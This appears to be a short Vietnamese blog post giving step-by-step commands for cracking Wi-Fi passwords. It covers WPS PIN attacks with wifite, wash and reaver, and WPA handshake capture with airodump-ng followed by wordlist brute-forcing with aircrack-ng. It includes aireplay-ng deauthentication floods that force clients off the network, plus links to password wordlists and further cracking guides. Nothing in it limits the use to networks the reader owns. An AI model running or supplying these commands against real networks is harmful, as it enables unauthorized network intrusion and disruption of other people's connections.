1. Khai thac loi bao mat WPS.
Su dung tool wifite. Cach su dung rat don gian.
- Start wifite len, bang cach go wifite tu command line
- Doi 1 luc, no se hien ra danh sach mang wifi kem theo kieu ma hoa, co enable WPS hay khong.
- Nhan Ctrl + C de stop. Thuc hien buoc tiep.
- Nhap so tuong ung voi mang wifi ma ban muon. Neu nhap nhieu hon 1, cac ban phan cach bang dau , hoac neu chon tat cac ban nhap vao "all"
- Buoc tiep theo la cho doi xem ket qua co kha quan hay khong
(Hoac dung lenh. Sau khi start airmon-ng start wlan0)
Hien thi danh sach cac mang enable WPS
wash -i mon0
Tiep den dung reaver
reaver -i mon0 -b [MAC] -c [channel id] -vv
2. Bruteforce su dung Word list
B1. Start mornitor.
Tu cua so command line, go airmon-ng start wlan0
B2. Hien thi danh sach cac mang wifi
airodump-ng mon0
B3. Luu lai thong tin handshake
airodump-ng --bssid [MAC cua access point] --channel [kenh] -w [duong dan] mon0
B4. Sau khi da capture duoc 4 buoc xac thuc handshake, thuc hien crack
aireplay-ng -a [MAC accesspoint] -c [MAC cua client] -0 20 mon0
hoac
aireplay-ng -a [MAC accesspoint] -c [MAC cua client] -0 0 mon0
B5. Crack password.
Mac dinh cac file o buoc 3 se luu o thu muc hien tai ma ban go lenh.
aircrack-ng -w [file pass] tenfile.cap
B6. Cho doi ket qua
Link danh sach wordlist:
- https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm
- https://wiki.skullsecurity.org/Passwords (rockyou.txt)
Tham khao:
http://www.wirelessdomination.com/how-to-crack-wpa2-and-wpa-wifi-password-step-by-step-guide/
http://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-with-cowpatty-0148423/
Thu kieu nay xem tn:
http://www.kunbum.net/2014/04/huong-dan-crack-wpa-wpa2-bang-gpu-tren.html
Nhận xét
Đăng nhận xét